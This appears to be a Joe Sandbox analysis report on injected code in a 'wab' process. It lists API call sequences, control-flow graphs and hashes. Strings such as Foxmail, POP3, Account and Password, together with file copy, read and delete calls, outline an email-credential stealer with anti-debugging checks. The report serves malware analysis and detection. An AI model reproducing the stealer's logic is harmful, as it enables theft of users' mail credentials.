20de72af 7689->7691 7691->7690 7692 20de72dd GetFileType 7691->7692 7692->7691 7131 20de21a1 ___scrt_dllmain_exception_filter 7693 20de9d61 7694 20de9d81 7693->7694 7697 20de9db8 7694->7697 7696 20de9dab 7698 20de9dbf 7697->7698 7699 20de9e20 7698->7699 7700 20de9ddf 7698->7700 7701 20deaa17 21 API calls 7699->7701 7702 20dea90e 7699->7702 7700->7702 7704 20deaa17 21 API calls 7700->7704 7703 20de9e6e 7701->7703 7702->7696 7703->7696 7705 20dea93e 7704->7705 7705->7696

                  Control-flow Graph

                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20DE1137
                  • lstrcatW.KERNEL32(?,?), ref: 20DE1151
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE115C
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE116D
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE117C
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20DE1193
                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 20DE11D0
                  • FindClose.KERNELBASE(00000000), ref: 20DE11DB
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                  • String ID:
                  • API String ID: 1083526818-0
                  • Opcode ID: dd9c5a04045f56e867c9c7cea27926857e12f3f0fd716cdee336ca97f901445b
                  • Instruction ID: 935f35b7981eb7946df8fe853234c970ebf28698f492eeb5bb5654544453d8a1
                  • Opcode Fuzzy Hash: dd9c5a04045f56e867c9c7cea27926857e12f3f0fd716cdee336ca97f901445b
                  • Instruction Fuzzy Hash: 622193716053086BD714EBA5DC49F9B7B9CEF84314F140D2EBA98D3190EB74D60487A6

                  Control-flow Graph

                  APIs
                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 20DE1434
                    • Part of subcall function 20DE10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20DE1137
                    • Part of subcall function 20DE10F1: lstrcatW.KERNEL32(?,?), ref: 20DE1151
                    • Part of subcall function 20DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE115C
                    • Part of subcall function 20DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE116D
                    • Part of subcall function 20DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20DE117C
                    • Part of subcall function 20DE10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20DE1193
                    • Part of subcall function 20DE10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 20DE11D0
                    • Part of subcall function 20DE10F1: FindClose.KERNELBASE(00000000), ref: 20DE11DB
                  • lstrlenW.KERNEL32(?), ref: 20DE14C5
                  • lstrlenW.KERNEL32(?), ref: 20DE14E0
                  • lstrlenW.KERNEL32(?,?), ref: 20DE150F
                  • lstrcatW.KERNEL32(00000000), ref: 20DE1521
                  • lstrlenW.KERNEL32(?,?), ref: 20DE1547
                  • lstrcatW.KERNEL32(00000000), ref: 20DE1553
                  • lstrlenW.KERNEL32(?,?), ref: 20DE1579
                  • lstrcatW.KERNEL32(00000000), ref: 20DE1585
                  • lstrlenW.KERNEL32(?,?), ref: 20DE15AB
                  • lstrcatW.KERNEL32(00000000), ref: 20DE15B7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                  • String ID: )$Foxmail$ProgramFiles
                  • API String ID: 672098462-2938083778
                  • Opcode ID: 33ae1d0594b5de33f17881ec4c99a546dc86efddf66dbe05833b32c2caec6152
                  • Instruction ID: a6aafabfd36d8f7b52773b982ae5425dc94e39560caae5f18489d2d390b1a935
                  • Opcode Fuzzy Hash: 33ae1d0594b5de33f17881ec4c99a546dc86efddf66dbe05833b32c2caec6152
                  • Instruction Fuzzy Hash: DB81C175A0135CA9DB20DBE1DC86FEE7379EF84700F00059AF508E7190EAB15A88CBA5

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(20DEC7DD), ref: 20DEC7E6
                  • GetModuleHandleA.KERNEL32(?,20DEC7DD), ref: 20DEC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 20DEC860
                    • Part of subcall function 20DEC803: GetProcAddress.KERNEL32(00000000,20DEC7F4), ref: 20DEC804
                    • Part of subcall function 20DEC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC816
                    • Part of subcall function 20DEC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC82A
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: a80ff50d44d4c8160d345babfbd25011a81b5a0c57a80d2ec682fa0b4742ff16
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: 7C01D61054724139AA1756F70EC2BAA6FD89B27660B183F5EF24CC6193D9908907D3B5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 79 20dec7a7-20dec7bc 80 20dec7be-20dec7c6 79->80 81 20dec82d 79->81 80->81 83 20dec7c8-20dec7f6 call 20dec7e6 80->83 82 20dec82f-20dec833 81->82 84 20dec835-20dec83d GetModuleHandleA 82->84 85 20dec872 call 20dec877 82->85 91 20dec86c-20dec86e 83->91 92 20dec7f8 83->92 88 20dec83f-20dec847 84->88 88->88 90 20dec849-20dec84c 88->90 90->82 93 20dec84e-20dec850 90->93 96 20dec866-20dec86b 91->96 97 20dec870 91->97 94 20dec7fa-20dec7fe 92->94 95 20dec85b-20dec85e 92->95 99 20dec856-20dec85a 93->99 100 20dec852-20dec854 93->100 102 20dec865 94->102 103 20dec800-20dec80b GetProcAddress 94->103 98 20dec85f-20dec860 GetProcAddress 95->98 96->91 97->90 98->102 99->95 100->98 102->96 103->81 104 20dec80d-20dec81a VirtualProtect 103->104 105 20dec82c 104->105 106 20dec81c-20dec82a VirtualProtect 104->106 105->81 106->105
                  APIs
                  • GetModuleHandleA.KERNEL32(?,20DEC7DD), ref: 20DEC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 20DEC860
                    • Part of subcall function 20DEC7E6: GetModuleHandleA.KERNEL32(20DEC7DD), ref: 20DEC7E6
                    • Part of subcall function 20DEC7E6: GetProcAddress.KERNEL32(00000000,20DEC7F4), ref: 20DEC804
                    • Part of subcall function 20DEC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC816
                    • Part of subcall function 20DEC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC82A
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction ID: d82e3fbc3fae3a7402cd74b16518a83c0082d069c124500019ce8a958b37832c
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: A721296140A2816FE71347F64D81BA57FD89B17260F1C2E9ED18CCB143D5A88D47D3B1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 107 20dec803-20dec80b GetProcAddress 108 20dec82d 107->108 109 20dec80d-20dec81a VirtualProtect 107->109 112 20dec82f-20dec833 108->112 110 20dec82c 109->110 111 20dec81c-20dec82a VirtualProtect 109->111 110->108 111->110 113 20dec835-20dec83d GetModuleHandleA 112->113 114 20dec872 call 20dec877 112->114 116 20dec83f-20dec847 113->116 116->116 117 20dec849-20dec84c 116->117 117->112 118 20dec84e-20dec850 117->118 119 20dec856-20dec85e 118->119 120 20dec852-20dec854 118->120 122 20dec85f-20dec865 GetProcAddress 119->122 120->122 124 20dec866-20dec86e 122->124 126 20dec870 124->126 126->117
                  APIs
                  • GetProcAddress.KERNEL32(00000000,20DEC7F4), ref: 20DEC804
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC816
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,20DEC7F4,20DEC7DD), ref: 20DEC82A
                  • GetModuleHandleA.KERNEL32(?,20DEC7DD), ref: 20DEC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 20DEC860
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: AddressProcProtectVirtual$HandleModule
                  • String ID:
                  • API String ID: 2152742572-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 2df6f471ca7fa121be4d75fa45a8c8126f02c4c4f4de2773776bc4d2cc9a7fff
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 06F08C5164724029AA1345F60EC1AAA5FCC8A27660B283E5EA24CC7183D895890792B6
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 20DE61DA
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 20DE61E4
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 20DE61F1
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 2c1e03ba67f88d4729e6a585a74cfccfade45c82fafc96dbbf60e361539293ea
                  • Instruction ID: ba095f8bc4119fb5bfa3fa802e481a4cff1c72ebe328204e07d552e20eb039ae
                  • Opcode Fuzzy Hash: 2c1e03ba67f88d4729e6a585a74cfccfade45c82fafc96dbbf60e361539293ea
                  • Instruction Fuzzy Hash: 4C31F47490231C9BCB61DF65C88879DBBB8BF08310F1041EAE81CA7260EB349F818F54
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,20DE4A8A,?,20DF2238,0000000C,20DE4BBD,00000000,00000000,00000001,20DE2082,20DF2108,0000000C,20DE1F3A,?), ref: 20DE4AD5
                  • TerminateProcess.KERNEL32(00000000,?,20DE4A8A,?,20DF2238,0000000C,20DE4BBD,00000000,00000000,00000001,20DE2082,20DF2108,0000000C,20DE1F3A,?), ref: 20DE4ADC
                  • ExitProcess.KERNEL32 ref: 20DE4AEE
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: c1c74ebffa33d4164bf2bd9d791a31ab4710c634d4db8173d070d4e72773c449
                  • Instruction ID: df24217249cf9ba045af67367cd4921072514c1e9836259dbe32fe496a16f980
                  • Opcode Fuzzy Hash: c1c74ebffa33d4164bf2bd9d791a31ab4710c634d4db8173d070d4e72773c449
                  • Instruction Fuzzy Hash: 69E0BF35006604AFCF016F95CD49A493B6AEF44355F544018F9198B522DB39ED82DA54
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 6f1f1a27f3cd31bef7d70c5745e713981ee930fa426324f23e0ed8216571e670
                  • Instruction ID: fae13ff00ae11c277b2de4feff63390a08175dbb0dcc4959910220b74cb8fb10
                  • Opcode Fuzzy Hash: 6f1f1a27f3cd31bef7d70c5745e713981ee930fa426324f23e0ed8216571e670
                  • Instruction Fuzzy Hash: 4C313A759012096FCB149FB6CC84EEB7BBDDB85384F1401ACF51CD7292E6319E458B60
                  APIs
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: ee1ae5b1d7fce1831cbf3f61de09fff61961f00a84dfd64928628d03ad6dc0ce
                  • Instruction ID: 01ea2e148aef83198bf089a21fbce898f9e97c3e839193d833091873ff62157e
                  • Opcode Fuzzy Hash: ee1ae5b1d7fce1831cbf3f61de09fff61961f00a84dfd64928628d03ad6dc0ce
                  • Instruction Fuzzy Hash: 96A00170A0BB028F97648F358E8E20D3AADAE456A5B1A8169A909C5164EB3CC451AA05

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 136 20de173a-20de17fe call 20dec030 call 20de2c40 * 2 143 20de1803 call 20de1cca 136->143 144 20de1808-20de180c 143->144 145 20de19ad-20de19b1 144->145 146 20de1812-20de1816 144->146 146->145 147 20de181c-20de1837 call 20de1ede 146->147 150 20de199f-20de19ac call 20de1ee7 * 2 147->150 151 20de183d-20de1845 147->151 150->145 152 20de184b-20de184e 151->152 153 20de1982-20de1985 151->153 152->153 157 20de1854-20de1881 call 20de44b0 * 2 call 20de1db7 152->157 155 20de1987 153->155 156 20de1995-20de1999 153->156 159 20de198a-20de198d call 20de2c40 155->159 156->150 156->151 170 20de193d-20de1943 157->170 171 20de1887-20de189f call 20de44b0 call 20de1db7 157->171 165 20de1992 159->165 165->156 172 20de197e-20de1980 170->172 173 20de1945-20de1947 170->173 171->170 185 20de18a5-20de18a8 171->185 172->159 173->172 175 20de1949-20de194b 173->175 178 20de194d-20de194f 175->178 179 20de1961-20de197c call 20de16aa 175->179 181 20de1955-20de1957 178->181 182 20de1951-20de1953 178->182 179->165 186 20de195d-20de195f 181->186 187 20de1959-20de195b 181->187 182->179 182->181 188 20de18aa-20de18c2 call 20de44b0 call 20de1db7 185->188 189 20de18c4-20de18dc call 20de44b0 call 20de1db7 185->189 186->172 186->179 187->179 187->186 188->189 198 20de18e2-20de193b call 20de16aa call 20de15da call 20de2c40 * 2 188->198 189->156 189->198 198->156
                  APIs
                    • Part of subcall function 20DE1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D1B
                    • Part of subcall function 20DE1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20DE1D37
                    • Part of subcall function 20DE1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D4B
                  • _strlen.LIBCMT ref: 20DE1855
                  • _strlen.LIBCMT ref: 20DE1869
                  • _strlen.LIBCMT ref: 20DE188B
                  • _strlen.LIBCMT ref: 20DE18AE
                  • _strlen.LIBCMT ref: 20DE18C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _strlen$File$CopyCreateDelete
                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                  • API String ID: 3296212668-3023110444
                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction ID: 70206738bb9f95b8bf578d983683d7873464a265fd40d8e48a72636749924f92
                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction Fuzzy Hash: 2B615579E02218ABEF19CBE6CC41BDEB7B9AF05204F14405EE21CA7281DB705A45CF62

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: %m$~$Gon~$~F@7$~dra
                  • API String ID: 4218353326-230879103
                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction ID: 46466f6ff88b99202bcde0ef0346dd2d574222eae7f4734a019a338e670ff143
                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction Fuzzy Hash: 56711875E022285BCF169BF68885BEF7BFC9B19204F14409EE64CD7141EA749B85CBA0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 276 20de7cc2-20de7cd6 277 20de7cd8-20de7cdd 276->277 278 20de7d44-20de7d4c 276->278 277->278 281 20de7cdf-20de7ce4 277->281 279 20de7d4e-20de7d51 278->279 280 20de7d93-20de7dab call 20de7e35 278->280 279->280 282 20de7d53-20de7d90 call 20de571e * 4 279->282 289 20de7dae-20de7db5 280->289 281->278 284 20de7ce6-20de7ce9 281->284 282->280 284->278 287 20de7ceb-20de7cf3 284->287 290 20de7d0d-20de7d15 287->290 291 20de7cf5-20de7cf8 287->291 295 20de7db7-20de7dbb 289->295 296 20de7dd4-20de7dd8 289->296 293 20de7d2f-20de7d43 call 20de571e * 2 290->293 294 20de7d17-20de7d1a 290->294 291->290 297 20de7cfa-20de7d0c call 20de571e call 20de90ba 291->297 293->278 294->293 302 20de7d1c-20de7d2e call 20de571e call 20de91b8 294->302 298 20de7dbd-20de7dc0 295->298 299 20de7dd1 295->299 303 20de7dda-20de7ddf 296->303 304 20de7df0-20de7dfc 296->304 297->290 298->299 306 20de7dc2-20de7dd0 call 20de571e * 2 298->306 299->296 302->293 310 20de7ded 303->310 311 20de7de1-20de7de4 303->311 304->289 313 20de7dfe-20de7e0b call 20de571e 304->313 306->299 310->304 311->310 319 20de7de6-20de7dec call 20de571e 311->319 319->310
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 20DE7D06
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE90D7
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE90E9
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE90FB
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE910D
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE911F
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE9131
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE9143
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE9155
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE9167
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE9179
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE918B
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE919D
                    • Part of subcall function 20DE90BA: _free.LIBCMT ref: 20DE91AF
                  • _free.LIBCMT ref: 20DE7CFB
                    • Part of subcall function 20DE571E: HeapFree.KERNEL32(00000000,00000000,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?), ref: 20DE5734
                    • Part of subcall function 20DE571E: GetLastError.KERNEL32(?,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?,?), ref: 20DE5746
                  • _free.LIBCMT ref: 20DE7D1D
                  • _free.LIBCMT ref: 20DE7D32
                  • _free.LIBCMT ref: 20DE7D3D
                  • _free.LIBCMT ref: 20DE7D5F
                  • _free.LIBCMT ref: 20DE7D72
                  • _free.LIBCMT ref: 20DE7D80
                  • _free.LIBCMT ref: 20DE7D8B
                  • _free.LIBCMT ref: 20DE7DC3
                  • _free.LIBCMT ref: 20DE7DCA
                  • _free.LIBCMT ref: 20DE7DE7
                  • _free.LIBCMT ref: 20DE7DFF
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: e3782c9646832807af66a8e99424bb090a6a94d0d42b8cb95c1f37d09ccbda54
                  • Instruction ID: 39f85542f57c15d0ea0a32862c950f3feb24519a6f6f3375547cb245a8ccc5f8
                  • Opcode Fuzzy Hash: e3782c9646832807af66a8e99424bb090a6a94d0d42b8cb95c1f37d09ccbda54
                  • Instruction Fuzzy Hash: 4A318F31602205EFDB61AFBADD85B6AB7EAEF00290F14445DEA4CD7151DF35AD90CB20

                  Control-flow Graph

                  APIs
                  • _free.LIBCMT ref: 20DE59EA
                    • Part of subcall function 20DE571E: HeapFree.KERNEL32(00000000,00000000,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?), ref: 20DE5734
                    • Part of subcall function 20DE571E: GetLastError.KERNEL32(?,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?,?), ref: 20DE5746
                  • _free.LIBCMT ref: 20DE59F6
                  • _free.LIBCMT ref: 20DE5A01
                  • _free.LIBCMT ref: 20DE5A0C
                  • _free.LIBCMT ref: 20DE5A17
                  • _free.LIBCMT ref: 20DE5A22
                  • _free.LIBCMT ref: 20DE5A2D
                  • _free.LIBCMT ref: 20DE5A38
                  • _free.LIBCMT ref: 20DE5A43
                  • _free.LIBCMT ref: 20DE5A51
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 6f22085ea8c704764e289453e633c0734e051639cce6da64ac1a748d62230be5
                  • Instruction ID: 503fab4aecbfc561b5f9397ac09d91448e00c523adbe6fdf3fba235d5394d667
                  • Opcode Fuzzy Hash: 6f22085ea8c704764e289453e633c0734e051639cce6da64ac1a748d62230be5
                  • Instruction Fuzzy Hash: DC11B97A511148FFCB11EF96C942EDD3FA5EF142D0B0540A9BA0C8F229DA31DE609BA0

                  Control-flow Graph

                  APIs
                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D1B
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20DE1D37
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D4B
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D58
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D72
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D7D
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE1D8A
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                  • String ID:
                  • API String ID: 1454806937-0
                  • Opcode ID: e4246d692718795088ffb7cd575a0b3cf3870728b8cbb85260ea2fad5e6a3d18
                  • Instruction ID: 153ab88c37eab93dbfa83d4cc524134883bb1994c7263c0c4310d1c47a7cd63d
                  • Opcode Fuzzy Hash: e4246d692718795088ffb7cd575a0b3cf3870728b8cbb85260ea2fad5e6a3d18
                  • Instruction Fuzzy Hash: D6216DB5A4221CBFDB10DBA18CCCFEF76ACEB18355F0809A9F505D2140DA749E459B70

                  Control-flow Graph

                  • Executed
                  • Not Executed
